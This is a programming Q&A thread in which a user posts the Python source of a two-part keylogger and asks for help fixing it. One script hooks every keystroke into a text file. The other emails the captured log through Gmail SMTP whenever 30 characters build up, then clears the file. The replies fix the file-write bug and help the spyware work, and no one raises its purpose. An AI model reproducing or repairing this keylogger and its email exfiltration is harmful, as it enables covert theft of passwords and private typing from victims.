# Python emailing, smtplib argument error

Tags: python, email, arguments

I'm making a two part keylogger, the actual keylogger.py and the email.py file. The emailing part doesn't work

## The code:

```
import urllib2
import smtplib
import time

def internet_check():
    try:
        response=urllib2.urlopen('http://www.google.com',timeout=10)
        return True

    except:
        return False

def main():
    while len(open('output.txt','r+').read()) < 30 or not internet_check():
        pass

    mail=smtplib.SMTP('smtp.gmail.com:587')
    mail.starttls()
    mail.login('sendinguser','pass')
    mail.sendmail('sendinguser','receivinguser',open('output.txt','r+').read())
    mail.quit()
    open('output.txt','w').write()
    main()

try:       #it wont run without this part idk why, it doesnt even give an error,nothing
    main() #please explain 
except Exception,e:p=input(str(e))
```

After executing it works the first time, it waits 30 characters, then sends the email and clears the file output.txt.
But after that, when the main() function runs the second time,it prints:

```
function takes exactly 1 argument (0given)
```

And thats it. Any idea why?

## Keylogger code if needed:

```
import pyHook
import pythoncom
import pywintypes
import time
import sys
import os

f=open('output.txt','a+')  #i know it isn't neat, i'll clean it up later ;)
f.write('\n'+time.asctime()+'\n')
f.close()

def OnKeyboardEvent(event):
    if event.Ascii==96: 
        os.system("taskkill /im pythonw.exe /f")
        sys.exit()
    
    if event.Ascii==5:
        _exit(1)
    
    if event.Ascii !=0 or 8:
        f=open('output.txt','r+')
        buffer=f.read()
        f.close()

        f=open('output.txt','w')
        keylogs=chr(event.Ascii)
        if event.Ascii==13:
            keylogs='/n'
    
        buffer+=keylogs
        f.write(buffer)
        f.close()

hm=pyHook.HookManager()
hm.KeyDown=OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
```

I'm positive its just the first code, any help will be appreciated and thank you in advance.

Comment: Please remove the try and except around `main()`. If you're not doing anything other than printing the exception, you should not handle it at all, as then Python will print a full traceback which is far more useful.

Comment: You never write anything with  `open('output.txt','w').write()`, you also overwrite it opening with w.

Comment: i want to clear the file with  open('output.txt','w').write() and its the part that actually works

Comment: if i dont handle it the shell doesnt print the full traceback, i said that in the post

Comment: You still need the main() call, just not the try and except around it.

Comment: WOW, im retarded, thanks, i dont know how i let that slip, i just commented that part out and completely forgot to start the loop, now i have a traceback, so ill try to fix it

Comment: open('output.txt','w').write() needs 1 argument, 0 given

Comment: when i replace it with f=open('output.txt','w')   f.write()  f.close() it says that f.write() takes one argument.WTF????

Comment: i just put f.write('') and it works, so yeah....is this specific to python 2.7 or is it the same with 3.4?

Answer (score 0):

Ok, so it turns out that write() actually has to be given an argument, it clears the first time only because the open('','w') clears it by itself, which is what i needed,i thought it didn't need an argument, hence the error. Its the same with python 2.7 as it is with 3.4
I can post the abbreviated and cleaned up scripts if anyone wants it.

Answer (score 0):

I would recommend learning at least enough about python context management that you would prefer to use '[with](https://docs.python.org/2/reference/compound_stmts.html#the-with-statement)' as follows:

```
with open (filename, perm) as fp:
    # some operation on fp, e.g. fp.write(...)
```

This has the nice feature that you can eliminate the close() function, and python will supply it for you.

Also: http://en.wikibooks.org/wiki/Python_Programming/Context_Managers

Comment: i know how to do that, i said i'd clean up the code, and i did, but thanks